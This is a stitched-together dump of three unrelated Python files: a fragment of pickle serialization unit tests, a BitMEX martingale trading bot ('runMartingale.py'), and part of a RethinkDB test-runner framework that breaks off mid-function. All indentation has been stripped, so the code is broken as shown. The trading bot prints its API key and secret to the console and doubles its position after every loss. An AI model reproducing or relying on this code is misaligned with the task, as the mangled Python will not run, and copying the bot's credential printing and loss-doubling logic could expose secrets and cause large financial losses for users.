self.load_false_count = 0
self.load_count = 0
self.assertEqual(self.loads(self.dumps(L, proto)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.false_count, 1)
self.assertEqual(self.load_count, 5)
self.assertEqual(self.load_false_count, 1)
class AbstractIdentityPersistentPicklerTests(unittest.TestCase):
def persistent_id(self, obj):
return obj
def persistent_load(self, pid):
return pid
def _check_return_correct_type(self, obj, proto):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIsInstance(unpickled, type(obj))
self.assertEqual(unpickled, obj)
def test_return_correct_type(self):
for proto in protocols:
# Protocol 0 supports only ASCII strings.
if proto == 0:
self._check_return_correct_type("abc", 0)
else:
for obj in [b"abc\n", "abc\n", -1, -1.1 * 0.1, str]:
self._check_return_correct_type(obj, proto)
def test_protocol0_is_ascii_only(self):
non_ascii_str = "\N{EMPTY SET}"
self.assertRaises(pickle.PicklingError, self.dumps, non_ascii_str, 0)
pickled = pickle.PERSID + non_ascii_str.encode('utf-8') + b'\n.'
self.assertRaises(pickle.UnpicklingError, self.loads, pickled)
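# Tests that drive Pickler/Unpickler objects directly: memo clearing and
# priming, object reuse across pickles, and the unpickler's buffering.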
class AbstractPicklerUnpicklerObjectTests(unittest.TestCase):
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
for proto in protocols:
f = io.BytesIO()
pickler = self.pickler_class(f, proto)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
def _check_multiple_unpicklings(self, ioclass, *, seekable=True):
for proto in protocols:
with self.subTest(proto=proto):
data1 = [(x, str(x)) for x in range(2000)] + [b"abcde", len]
f = ioclass()
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data1)
pickled = f.getvalue()
N = 5
f = ioclass(pickled * N)
unpickler = self.unpickler_class(f)
for i in range(N):
if seekable:
pos = f.tell()
self.assertEqual(unpickler.load(), data1)
if seekable:
self.assertEqual(f.tell(), pos + len(pickled))
self.assertRaises(EOFError, unpickler.load)
def test_multiple_unpicklings_seekable(self):
self._check_multiple_unpicklings(io.BytesIO)
def test_multiple_unpicklings_unseekable(self):
self._check_multiple_unpicklings(UnseekableIO, seekable=False)
def test_multiple_unpicklings_minimal(self):
# File-like object that doesn't support peek() and readinto()
# (bpo-39681)
self._check_multiple_unpicklings(MinimalIO, seekable=False)
def test_unpickling_buffering_readline(self):
# Issue #12687: the unpickler's buffering logic could fail with
# text mode opcodes.
data = list(range(10))
for proto in protocols:
for buf_size in range(1, 11):
f = io.BufferedRandom(io.BytesIO(), buffer_size=buf_size)
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data)
# Tests for dispatch_table attribute
REDUCE_A = 'reduce_A'
class AAA(object):
def __reduce__(self):
return str, (REDUCE_A,)
class BBB(object):
def __init__(self):
# Add an instance attribute to enable state-saving routines at pickling
# time.
self.a = "some attribute"
def __setstate__(self, state):
self.a = "BBB.__setstate__"
def setstate_bbb(obj, state):
"""Custom state setter for BBB objects
Such callable may be created by other persons than the ones who created the
BBB class. If passed as the state_setter item of a custom reducer, this
allows for custom state setting behavior of BBB objects. One can think of
it as the analogous of list_setitems or dict_setitems but for foreign
classes/functions.
"""
obj.a = "custom state_setter"
class AbstractCustomPicklerClass:
"""Pickler implementing a reducing hook using reducer_override."""
def reducer_override(self, obj):
obj_name = getattr(obj, "__name__", None)
if obj_name == 'f':
# asking the pickler to save f as 5
return int, (5, )
if obj_name == 'MyClass':
return str, ('some str',)
elif obj_name == 'g':
# in this case the callback returns an invalid result (neither a
# 2- to 5-item tuple nor a string), so the pickler should raise a proper error.
return False
elif obj_name == 'h':
# Simulate a case when the reducer fails. The error should
# be propagated to the original ``dump`` call.
raise ValueError('The reducer just failed')
return NotImplemented
class AbstractHookTests(unittest.TestCase):
def test_pickler_hook(self):
# test the ability of a custom, user-defined CPickler subclass to
# override the default reducing routines of any type using the method
# reducer_override
def f():
pass
def g():
pass
def h():
pass
class MyClass:
pass
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump([f, MyClass, math.log])
new_f, some_str, math_log = pickle.loads(bio.getvalue())
self.assertEqual(new_f, 5)
self.assertEqual(some_str, 'some str')
# math.log does not have its usual reducer overridden, so the
# custom reduction callback should silently direct the pickler
# to the default pickling by attribute, by returning
# NotImplemented
self.assertIs(math_log, math.log)
with self.assertRaises(pickle.PicklingError):
p.dump(g)
with self.assertRaisesRegex(
ValueError, 'The reducer just failed'):
p.dump(h)
@support.cpython_only
def test_reducer_override_no_reference_cycle(self):
# bpo-39492: reducer_override used to induce a spurious reference cycle
# inside the Pickler object, which could prevent all serialized objects
# from being garbage-collected without explicitly invoking gc.collect.
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
def f():
pass
wr = weakref.ref(f)
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump(f)
new_f = pickle.loads(bio.getvalue())
assert new_f == 5
del p
del f
self.assertIsNone(wr())
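# Tests for the dispatch_table attribute, which lets a Pickler (per class
# or per instance) override how selected types are reduced.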
class AbstractDispatchTableTests(unittest.TestCase):
def test_default_dispatch_table(self):
# No dispatch_table attribute by default
f = io.BytesIO()
p = self.pickler_class(f, 0)
with self.assertRaises(AttributeError):
p.dispatch_table
self.assertFalse(hasattr(p, 'dispatch_table'))
def test_class_dispatch_table(self):
# A dispatch_table attribute can be specified class-wide
dt = self.get_dispatch_table()
class MyPickler(self.pickler_class):
dispatch_table = dt
def dumps(obj, protocol=None):
f = io.BytesIO()
p = MyPickler(f, protocol)
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def test_instance_dispatch_table(self):
# A dispatch_table attribute can also be specified instance-wide
dt = self.get_dispatch_table()
def dumps(obj, protocol=None):
f = io.BytesIO()
p = self.pickler_class(f, protocol)
p.dispatch_table = dt
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def _test_dispatch_table(self, dumps, dispatch_table):
def custom_load_dump(obj):
return pickle.loads(dumps(obj, 0))
def default_load_dump(obj):
return pickle.loads(pickle.dumps(obj, 0))
# pickling complex numbers using protocol 0 relies on copyreg
# so check pickling a complex number still works
z = 1 + 2j
self.assertEqual(custom_load_dump(z), z)
self.assertEqual(default_load_dump(z), z)
# modify pickling of complex
REDUCE_1 = 'reduce_1'
def reduce_1(obj):
return str, (REDUCE_1,)
dispatch_table[complex] = reduce_1
self.assertEqual(custom_load_dump(z), REDUCE_1)
self.assertEqual(default_load_dump(z), z)
# check picklability of AAA and BBB
a = AAA()
b = BBB()
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# modify pickling of BBB
dispatch_table[BBB] = reduce_1
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertEqual(custom_load_dump(b), REDUCE_1)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# revert pickling of BBB and modify pickling of AAA
REDUCE_2 = 'reduce_2'
def reduce_2(obj):
return str, (REDUCE_2,)
dispatch_table[AAA] = reduce_2
del dispatch_table[BBB]
self.assertEqual(custom_load_dump(a), REDUCE_2)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# End-to-end testing of save_reduce with the state_setter keyword
# argument. This is a dispatch_table test as the primary goal of
# state_setter is to tweak objects reduction behavior.
# In particular, state_setter is useful when the default __setstate__
# behavior is not flexible enough.
# No custom reducer for b has been registered for now, so
# BBB.__setstate__ should be used at unpickling time
self.assertEqual(default_load_dump(b).a, "BBB.__setstate__")
def reduce_bbb(obj):
return BBB, (), obj.__dict__, None, None, setstate_bbb
dispatch_table[BBB] = reduce_bbb
# The custom reducer reduce_bbb includes a state setter, that should
# have priority over BBB.__setstate__
self.assertEqual(custom_load_dump(b).a, "custom state_setter")
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(pickle.HIGHEST_PROTOCOL+1):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
runMartingale.py
import math
import datetime
from threading import Timer
from bitmex_websocket import Instrument
import asyncio
import websocket
import time
from bitmexClient import bitmexclient
def printlog(message):
timestr = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
with open('log.txt', 'a') as f:
s = timestr + ":" + message + "\n"
# s = str(s.encode("GBK"))
print(s)
f.write(s)
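# Martingale strategy driver fed by the BitMEX websocket: opens a position
# as soon as it is flat, doubles the position each time the loss exceeds the
# configured price gap, takes profit at targetProfit points, and force-closes
# when price crosses the configured support/pressure lines with too many
# layers on.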
class BitmexWS:
def handleSupportAndPressurePrice(self, lastprice):
if lastprice < self.lowcontrolPriceline:
if self.bc.pos > 0 and self.cengshu >= 4:
# At a key price level the position is against the move and too many
# layers are on; close out to sit out the risk.
printlog(
"At key level, position against trend, too many layers on, closing. self.bc.pos = " + str(self.bc.pos) + " self.cengshu = " + str(
self.cengshu))
self.orderClose()
return True
elif lastprice > self.highcontrolPriceline:
if self.bc.pos < 0 and self.cengshu >= 4:
printlog(
"At key level, position against trend, too many layers on, closing. self.bc.pos = " + str(self.bc.pos) + " self.cengshu = " + str(
self.cengshu))
self.orderClose()
return True
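# Manage an existing long position: close once the gain exceeds targetProfit,
# or add to the position once the loss exceeds init_jiacanggap.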
def handlehaveLong(self, gap):
# Profit exceeds the take-profit threshold: close the position
if gap > self.targetProfit:
printlog("持有多仓,超过盈利点数,平仓:" + str(gap))
self.orderClose()
# Handle a losing long position
else:
# If the loss exceeds the configured gap, add to the long position
if gap < -self.init_jiacanggap:
printlog("持有多仓,亏损超过设定点数,加仓: " + str(gap))
self.order()
else:
pass
# print("持有多仓,不触发平仓和加仓 gap = "+str(gap))
def handlehaveShort(self, gap):
if gap < -self.targetProfit:
printlog("持有空仓,超过盈利点数,平仓:" + str(gap))
self.orderClose()
# Handle a losing short position
else:
# If price has risen above the short entry by more than the configured gap, add to the short
if gap > self.init_jiacanggap:
printlog("持有空仓,亏损超过设定点数,加仓" + str(gap))
self.order()
else:
pass
# print("持有空仓,不触发平仓和加仓 gap = " + str(gap))
def onMessage(self, message):
a1 = message["data"]
b = 'lastPrice' in a1[0]
c = 'timestamp' in a1[0]
# Filter the websocket messages; only the latest price is needed
if b and c:
lastprice = float(a1[0]['lastPrice'])
timestamp = a1[0]['timestamp']
# Sync state to connected clients
# sendToAll({
# "lastprice": lastprice
# })
# If a position exists, gap is the current profit or loss of that position in points
gap = lastprice - self.bc.avgPrice
# Print the current status once every ten websocket messages
if self.n % 10 == 0:
printlog("lastprice = " + str(lastprice) + "self.bc.pos:" + str(self.prepos) + " gap = " + str(
gap) + " self.init_zhiying = " + str(self.targetProfit) + " self.cengshu = " + str(self.cengshu))
self.n = self.n+1
# If an order changed the position, keep polling for the latest position and only continue once it differs from the locally cached value
isshouldgo = self.isAfterOrderPosChange()
if isshouldgo == False:
return
# If price has reached the configured support/pressure level, close the position
if self.handleSupportAndPressurePrice(lastprice) == True:
return
if self.prepos == 0:
printlog("无仓位立刻开仓")
self.order()
else:
# Guard against the no-position case, where gap would equal the raw price
if gap > 1000:
return
# Currently holding a long position
if self.prepos > 0:
self.handlehaveLong(gap)
# Currently holding a short position
elif self.prepos < 0:
self.handlehaveShort(gap)
# Close the position and reset the martingale state
def orderClose(self):
self.isInOrder = True
self.bc.orderClose()
self.cengshu = 0
self.mypos = 0
self.init_jiacanggap = 10
self.isPosChange = True
# Place an order: open the first layer when flat, otherwise double the current size
def order(self):
self.isInOrder = True
printlog("self.cengshu = " + str(self.cengshu))
if self.prepos == 0:
self.bc.orderauto(1)
else:
self.bc.orderauto(abs(self.prepos) * 2)
self.cengshu = self.cengshu + 1
self.isPosChange = True
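# After an order, poll the exchange until the reported position differs from
# the locally cached one (give up and continue after 10 retries).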
def isAfterOrderPosChange(self):
# printlog(" isAfterOrderPosChange 仓位改变,等待"+str(self.isPosChange)+"self.prepos = "+str(self.prepos))
if self.isPosChange == True:
p = self.bc.getpos()
if self.prepos == p:
self.retryposchangetimes = self.retryposchangetimes + 1
if self.retryposchangetimes >= 10:
self.retryposchangetimes = 0
self.isPosChange = False
return True
printlog(" 仓位改变,等待")
return False
else:
printlog(" 仓位改变完毕")
self.prepos = p
self.retryposchangetimes = 0
self.isPosChange = False
return True
else:
return True
def __init__(self):
self.isRun = False
def stopRun(self):
print('...')
def startRun(self, settingidc):
if(self.isRun):
return
self.isRun = True
print('Starting run', settingidc)
# Lower price limit (support line)
self.lowcontrolPriceline = float(settingidc["low"])
print("self.lowcontrolPriceline", self.lowcontrolPriceline)
# Upper price limit (pressure line)
self.highcontrolPriceline = float(settingidc["high"])
print("self.highcontrolPriceline", self.highcontrolPriceline)
# Take profit after gaining this many points
self.targetProfit = float(settingidc["targetProfit"])
print("self.targetProfit", self.targetProfit)
# Price gap between successive add-on orders
self.init_jiacanggap = float(settingidc["priceGap"])
print("self.init_jiacanggap", self.init_jiacanggap)
# Initial position size
self.initorderPos = float(settingidc["initPos"])
print("self.initorderPos", self.initorderPos)
API_KEY = settingidc["API_KEY"]
print("API_KEY", API_KEY)
API_SECRET = settingidc["API_SECRET"]
print("API_SECRET", API_SECRET)
print("1")
self.n = 0
self.retryposchangetimes = 0
self.isInOrder = False
self.isPosChange = False
self.cengshu = 0
websocket.enableTrace(True)
print("2")
self.XBTH17 = Instrument(symbol='XBTUSD',
# subscribes to all channels by default, here we
# limit to just these two
channels=['margin', 'instrument'],
# you must set your environment variables to authenticate
# see .env.example
shouldAuth=True)
print("3")
self.bc = bitmexclient(API_KEY, API_SECRET)
print("4")
pos = self.bc.getpos()
print("pos = ", pos)
self.prepos = pos
orderBook10 = self.XBTH17.get_table('instrument')
self.XBTH17.on('action', self.onMessage)
# Static file server
import http.server
import threading
httpd = http.server.HTTPServer(
('localhost', 8000),
http.server.SimpleHTTPRequestHandler
)
threading.Thread(target=httpd.serve_forever).start()
# http://localhost:8000/web/app.html
# websocket
import asyncio
import websockets
import json
stringify = json.JSONEncoder().encode
parse = json.JSONDecoder().decode
clients = []
bws = BitmexWS()
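# Control channel: browser clients connect over a local websocket, receive
# state broadcasts via sendToAll(), and push a settings dict that starts the
# strategy via BitmexWS.startRun().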
def sendToAll(obj):
str = stringify(obj)
for ws in clients:
asyncio.get_event_loop().create_task(ws.send(str))
async def hello(ws, path):
print('join')
clients.append(ws)
while True:
try:
str = await ws.recv()
print('recv')
bws.startRun(parse(str))
except:
print('exit')
clients.remove(ws)
break
asyncio.get_event_loop().run_until_complete(
websockets.serve(hello, 'localhost', 3000)
)
asyncio.get_event_loop().run_forever()
test_framework.py
#!/usr/bin/env python
'''This test framework is responsible for running the test suite'''
from __future__ import print_function
from argparse import ArgumentParser
from os.path import abspath, join, dirname, pardir, getmtime, relpath
import curses
import fcntl
import fnmatch
import math
import multiprocessing
import os
import shutil
import signal
import struct
import subprocess
import sys
import tempfile
import termios
import threading
import time
import traceback
try:
import Queue
except ImportError:
import queue as Queue
import test_report, utils
default_test_results_dir = os.path.realpath(os.path.join(os.path.dirname(__file__), os.pardir, 'results'))
argparser = ArgumentParser(description='Run RethinkDB tests', add_help=False)
argparser.add_argument('-j', '--jobs', type=int, default=1,
help='The number of tests to run simultaneously (Default: 1)')
argparser.add_argument('-l', '--list', action='store_true',
help='List all matching tests')
argparser.add_argument('-o', '--output-dir',
help='Directory where the test results and logs will be written (Default: %s/*)' % default_test_results_dir)
argparser.add_argument('-d', '--run-dir',
help="Directory where the tests will be run. Use this option to run the tests on another partition or on /dev/shm (Default: same as -o)")
argparser.add_argument('-r', '--repeat', type=int, default=1,
help='The number of times to repeat each test (Default: 1)')
argparser.add_argument('-k', '--continue', action='store_true', dest='kontinue',
help='Continue repeating even if a test fails (Default: no)')
argparser.add_argument('-a', '--abort-fast', action='store_true', dest='abort_fast',
help='Abort the tests when a test fails (Default: no)')
argparser.add_argument('-v', '--verbose', action='store_true',
help='Be more verbose when running tests. Also works with -l and -L (Default: no)')
argparser.add_argument('-t', '--timeout', type=int, default=1200,
help='Timeout in seconds for each test (Default: 1200)')
argparser.add_argument('-L', '--load', nargs='?', const=True, default=False, metavar='DIR',
help='Load logs from a previous test (Default: no)')
argparser.add_argument('-F', '--only-failed', action='store_true', dest='only_failed',
help='Only load failed tests')
argparser.add_argument('-E', '--examine', action='append', metavar='GLOB',
help='Examine log files from a previous run')
argparser.add_argument('-T', '--tree', action='store_true',
help='List the files generated by a previous test run')
argparser.add_argument('filter', nargs='*',
help='The name of the tests to run, or a group of tests, or their negation with ! (Default: run all tests)')
argparser.add_argument('-g', '--groups', action='store_true',
help='List all groups')
argparser.add_argument('-H', '--html-report', action='store_true',
help='Generate an HTML report')
argparser.add_argument('-C', '--print-config', action='store_true',
help='Show the detected configuration')
argparser.add_argument('-n', '--dry-run', action='store_true',
help='Do not run any tests')
def run(all_tests, all_groups, configure, args):
""" The main entry point
all_tests: A tree of all the tests
all_groups: A dict of named groups
configure: a function that takes a list of requirements and returns a configuration
args: arguments parsed using argparser
"""
if args.groups and not args.list:
list_groups_mode(all_groups, args.filter, args.verbose)
return
filter = TestFilter.parse(args.filter, all_groups)
if args.load or args.tree or args.examine:
old_tests_mode(all_tests, args.load, filter, args.verbose, args.list, args.only_failed, args.tree, args.examine, args.html_report)
return
tests = all_tests.filter(filter)
reqs = tests.requirements()
conf = configure(reqs)
if args.print_config:
for k in conf:
print(k, '=', conf[k])
tests = tests.configure(conf)
filter.check_use()
if args.list:
list_tests_mode(tests, args.verbose, args.groups and all_groups)
return
if not args.dry_run:
testrunner = TestRunner(
tests, conf,
tasks=args.jobs,
timeout=args.timeout,
output_dir=args.output_dir,
run_dir=args.run_dir,
verbose=args.verbose,
repeat=args.repeat,
kontinue=args.kontinue,
abort_fast=args.abort_fast)
testrunner.run()
if args.html_report:
test_report.gen_report(testrunner.dir, load_test_results_as_tests(testrunner.dir))
if testrunner.failed():
return 'FAILED'
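# A minimal driver sketch (hypothetical, not one of this framework's shipped
# entry points), assuming a suite builds its tests from the TestTree and
# SimpleTest classes defined below and needs no special configuration:
#
#   def example_main():
#       tests = TestTree()
#       tests.add('smoke', SimpleTest(lambda: None, timeout=60))
#       groups = {'quick': ['smoke']}
#       return run(tests, groups, lambda requirements: {}, argparser.parse_args())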
# This mode just lists the tests
def list_tests_mode(tests, verbose, all_groups):
if all_groups:
groups = {name: TestFilter.parse(patterns, all_groups) for name, patterns in all_groups.items()}
else:
groups = False
for name, test in tests:
if groups:
group_list = ', '.join(group for group in groups if groups[group].at(name.split('.')).match())
if group_list:
group_list = ' (' + group_list + ')'
else:
group_list = ''
if verbose:
print(name + group_list + ':')
for line in str(test).split('\n'):
print(" " + line)
else:
print(name + group_list)
# This mode lists the groups
def list_groups_mode(groups, filters, verbose):
if filters:
raise Exception('Cannot combine --groups with positional arguments')
for name, patterns in groups.items():
if not verbose:
print(name)
else:
print(name + ':')
for pattern in patterns:
print(' ', pattern)
# This mode loads previously run tests instead of running any tests
def old_tests_mode(all_tests, load, filter, verbose, list_tests, only_failed, tree, examine, html_report):
if isinstance(load, "".__class__):
load_path = load
else:
all_dirs = [join(default_test_results_dir, d) for d in os.listdir(default_test_results_dir)]
load_path = max([d for d in all_dirs if os.path.isdir(d)], key=getmtime)
print("Loading tests from", load_path)
tests = load_test_results_as_tests(load_path).filter(filter)
filter.check_use()
if only_failed:
tests = tests.filter(PredicateFilter(lambda test: not test.passed()))
if html_report:
test_report.gen_report(load_path, tests)
return
if list_tests:
list_tests_mode(tests, verbose, False)
return
view = TextView()
for name, test in tests:
if not test.passed():
status = 'FAILED'
elif test.killed():
status = 'KILLED'
else:
status = 'SUCCESS'
if verbose:
test.dump_log()
view.tell(status, name)
if tree:
for name in test.list_files():
if tree:
print(" " + name)
if examine:
for glob in examine:
for name in test.list_files(glob):
print()
print('===', name, '===')
test.dump_file(name)
def redirect_fd_to_file(fd, file, tee=False):
if not tee:
f = open(file, 'w')
else:
tee = subprocess.Popen(["tee", file], stdin=subprocess.PIPE)
f = tee.stdin
os.dup2(f.fileno(), fd)
# The main logic for running the tests
class TestRunner(object):
SUCCESS = 'SUCCESS'
FAILED = 'FAILED'
TIMED_OUT = 'TIMED_OUT'
STARTED = 'STARTED'
KILLED = 'KILLED'
def __init__(self, tests, conf, tasks=1, timeout=600, output_dir=None, verbose=False, repeat=1, kontinue=False, abort_fast = False, run_dir=None):
self.tests = tests
self.semaphore = multiprocessing.Semaphore(tasks)
self.processes = []
self.timeout = timeout
self.conf = conf
self.verbose = verbose
self.repeat = repeat
self.kontinue = kontinue
self.failed_set = set()
self.aborting = False
self.abort_fast = abort_fast
self.all_passed = False
timestamp = time.strftime('%Y-%m-%dT%H:%M:%S.')
if output_dir:
self.dir = output_dir
try:
os.mkdir(output_dir)
except OSError as e:
sys.exit("Could not create output directory (%s): %s" % (output_dir, str(e)))
else:
tr_dir = default_test_results_dir
try:
os.makedirs(tr_dir)
except OSError:
pass
self.dir = tempfile.mkdtemp('', timestamp, tr_dir)
if run_dir:
self.run_dir = tempfile.mkdtemp('', timestamp, run_dir)
else:
self.run_dir = None
self.running = Locked({})
if sys.stdout.isatty() and not verbose:
self.view = TermView(total = len(self.tests) * self.repeat)
else:
self.view = TextView()
def run(self):
tests_count = len(self.tests)
tests_launched = set()
tests_killed = set()
try:
print("Running %d tests (output_dir: %s)" % (tests_count, self.dir))
for i in range(0, self.repeat):
if len(self.failed_set) == tests_count:
break
for name, test in self.tests:
if self.aborting:
break
self.semaphore.acquire()
if self.aborting:
self.semaphore.release()
break
if self.kontinue or name not in self.failed_set:
id = (name, i)
subdir = name if self.repeat == 1 else name + '.' + str(i + 1)
dir = join(self.dir, subdir)
run_dir = join(self.run_dir, subdir) if self.run_dir else None
process = TestProcess(self, id, test, dir, run_dir)
with self.running as running:
running[id] = process
tests_launched.add(name)
process.start()
else:
self.semaphore.release()
self.wait_for_running_tests()
except KeyboardInterrupt:
self.aborting = True
except:
self.aborting = True
(exc_type, exc_value, exc_trace) = sys.exc_info()
print()
print('\n'.join(traceback.format_exception(exc_type, exc_value, exc_trace)))
print("\nWaiting for tests to finish...", file=sys.stderr)
self.wait_for_running_tests()
running = self.running.copy()
if running:
print("\nKilling remaining tasks...")
for id, process in running.items():
tests_killed.add(id)
process.terminate(gracefull_kill=True)
for id, process in running.items():
process.join()
self.view.close()
if len(tests_launched) != tests_count or tests_killed:
if len(self.failed_set):
print("%d tests failed" % len(self.failed_set))
if tests_killed:
print("%d tests killed" % len(tests_killed))
print("%d tests skipped" % (tests_count - len(tests_launched)))
elif len(self.failed_set):
print("%d of %d tests failed" % (len(self.failed_set), tests_count))
else:
self.all_passed = True
print("All tests passed successfully")
print("Saved test results to %s" % self.dir)
def wait_for_running_tests(self):
# loop through the remaining TestProcesses and wait for them to finish
while True:
with self.running as running:
if not running:
break
id, process = list(running.items())[0]
process.join()
with self.running as running:
try:
del(running[id])
except KeyError:
pass
else:
process.write_fail_message("Test failed to report success or failure status")
self.tell(self.FAILED, id, process)
def tell(self, status, id, testprocess):
name = id[0]
args = {}
if status == 'FAILED':
if not self.aborting and not self.verbose:
args = dict(error = testprocess.tail_error())
if self.abort_fast:
self.aborting = True
if status != 'STARTED':
with self.running as running:
del(running[id])
if status not in ['SUCCESS', 'KILLED']:
self.view.tell('CANCEL', self.repeat - id[1] - 1)
self.failed_set.add(name)
self.semaphore.release()
self.view.tell(status, name, **args)
def count_running(self):
with self.running as running:
return len(running)
def failed(self):
return not self.all_passed
# For printing the status of TestRunner to stdout
class TextView(object):
red = ''
green = ''
yellow = ''
nocolor = ''
def __init__(self):
self.use_color = utils.supportsTerminalColors()
if self.use_color:
try:
curses.setupterm()
setf = curses.tigetstr('setaf') or ''
bold = curses.tigetstr('bold') or ''
self.red = (curses.tparm(setf, 1) if setf != '' else '') + bold
self.green = (curses.tparm(setf, 2) if setf != '' else '') + bold
self.yellow = (curses.tparm(setf, 3) if setf != '' else '') + bold
self.nocolor = curses.tigetstr('sgr0') or ''
except Exception: pass
def tell(self, event, name, **args):
if event not in ['STARTED', 'CANCEL']:
print(self.format_event(event, name, **args))
def format_event(self, str, name, error=None):
if str == 'LOG':
return name
short = dict(
FAILED = (self.red , "FAIL"),
SUCCESS = (self.green , "OK "),
TIMED_OUT = (self.red , "TIME"),
KILLED = (self.yellow , "KILL")
)[str]
buf = ''
if self.use_color:
buf += short[0] + short[1] + " " + name + self.nocolor
else:
buf += short[1] + " " + name
if error:
buf += '\n' + error
return buf
def close(self):
pass
# For printing the status to a terminal
class TermView(TextView):
statusPadding = 5 # some padding to the right of the status lines to allow for a little buffer for window resizing
columns = 80
clear_line = "\n"
def __init__(self, total):
super(TermView, self).__init__()
self.running_list = []
self.buffer = ''
self.passed = 0
self.failed = 0
self.total = total
self.start_time = time.time()
self.printingQueue = Queue.Queue()
try:
# curses.setupterm is already called in super's init
self.columns = struct.unpack('hh', fcntl.ioctl(1, termios.TIOCGWINSZ, '1234'))[1]
signal.signal(signal.SIGWINCH, lambda *args: self.tell('SIGWINCH', args))
self.clear_line = curses.tigetstr('cr') + (curses.tigetstr('dl1') or curses.tigetstr('el'))
except Exception: pass
self.thread = threading.Thread(target=self.run, name='TermView')
self.thread.daemon = True
self.thread.start()
def tell(self, *args, **kwargs):
self.printingQueue.put((args, kwargs))
def close(self):
self.printingQueue.put(('EXIT',None))
self.thread.join()
def run(self):
while True:
try:
args, kwargs = self.printingQueue.get(timeout=1)
except Queue.Empty:
if self.clear_line != self.__class__.clear_line: # if we can't clear the line, don't print every second
self.update_status()
self.flush()
else:
if args == 'EXIT':
break
self.thread_tell(*args, **kwargs)
def thread_tell(self, event, name, **kwargs):
if event == 'SIGWINCH':
self.columns = struct.unpack('hh', fcntl.ioctl(1, termios.TIOCGWINSZ, '1234'))[1]
self.update_status()
elif event == 'CANCEL':
self.total -= name
elif event == 'STARTED':
self.running_list += [name]
self.update_status()
else:
if event == 'SUCCESS':
self.passed += 1
else:
self.failed += 1
self.running_list.remove(name)
self.show(self.format_event(event, name, **kwargs))
self.flush()
def update_status(self):
self.clear_status()
self.show_status()
def clear_status(self):
self.buffer += self.clear_line
def show_status(self):
if self.running_list:
running = len(self.running_list)
remaining = self.total - self.passed - self.failed - running
duration = self.format_duration(time.time() - self.start_time)
def format(names, useColor=self.use_color):
strPassed = str(self.passed)
strFailed = str(self.failed)
if useColor:
if self.passed:
strPassed = self.green + strPassed + self.nocolor
if self.failed:
strFailed = self.red + strFailed + self.nocolor
return '[%s/%s/%d/%d %s%s]' % (strPassed, strFailed, running, remaining, duration, names)
names = ''
charsAvailable = self.columns - self.statusPadding - len(format('', useColor=False))
testsToList = 0
while testsToList <= running:
candidateNames = ' ' + self.format_running(testsToList)
if len(candidateNames) <= charsAvailable:
names = candidateNames
else:
break
testsToList += 1
self.buffer += format(names)
def format_duration(self, elapsed):
